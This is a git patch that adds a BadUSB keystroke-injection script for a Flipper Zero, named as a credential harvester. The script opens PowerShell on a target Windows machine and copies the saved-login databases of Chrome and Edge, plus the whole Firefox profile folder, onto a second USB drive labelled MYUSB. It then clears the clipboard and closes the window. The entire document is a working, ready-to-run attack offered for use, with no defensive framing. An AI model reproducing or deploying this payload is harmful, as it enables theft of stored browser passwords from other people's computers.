From 701953acde7fe6c66d2d29c0375e9caecb26f3fd Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 14 May 2024 11:52:39 -0400 Subject: [PATCH] Create CredentialHarvesterByMarkCyber Harvests all credentials from chrome, firefox and edge while saving it to a secondary USB for further analysis. Name the secondary usb "MYUSB" for this to work properly. --- BadUSB/CredentialHarvesterByMarkCyber | 62 +++++++++++++++++++++++++++ 1 file changed, 62 insertions(+) create mode 100644 BadUSB/CredentialHarvesterByMarkCyber diff --git a/BadUSB/CredentialHarvesterByMarkCyber b/BadUSB/CredentialHarvesterByMarkCyber new file mode 100644 index 00000000..b66d4625 --- /dev/null +++ b/BadUSB/CredentialHarvesterByMarkCyber @@ -0,0 +1,62 @@ +REM This script was created by github.com/MarkCyber +REM Harvests all credentials from chrome, edge, and firefox +REM This script requires a secondary USB named "MYUSB" to save credentials to +REM The extracted data will require decryption + +REM Set delay for Flipper Zero +DELAY 1000 + +REM Open PowerShell with elevated privileges +GUI r +DELAY 500 +STRING powershell +DELAY 500 +ENTER +DELAY 1000 + +REM Check if the USB drive exists +STRING $usbDrive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'MYUSB' } | Select -ExpandProperty DriveLetter; +STRING if ($usbDrive -ne $null) { +ENTER +DELAY 500 +STRING cd $usbDrive; +ENTER +DELAY 500 +STRING mkdir BrowserData; +ENTER +DELAY 500 +STRING cd BrowserData; +ENTER +DELAY 500 + +REM Copy Chrome Login Data to USB +STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"; +STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData"; } +ENTER +DELAY 500 + +REM Copy Firefox Login Data to USB +STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\"; +STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData"; } +ENTER +DELAY 500 + +REM Copy Edge Login Data to USB +STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data"; +STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData"; } +ENTER +DELAY 500 +STRING } +ENTER +DELAY 500 + +REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on targetPC) +STRING echo off | clip +ENTER +DELAY 500 + +REM Close PowerShell +STRING exit +ENTER +DELAY 500 +REM Check out my other badusb scripts on github.com/MarkCyber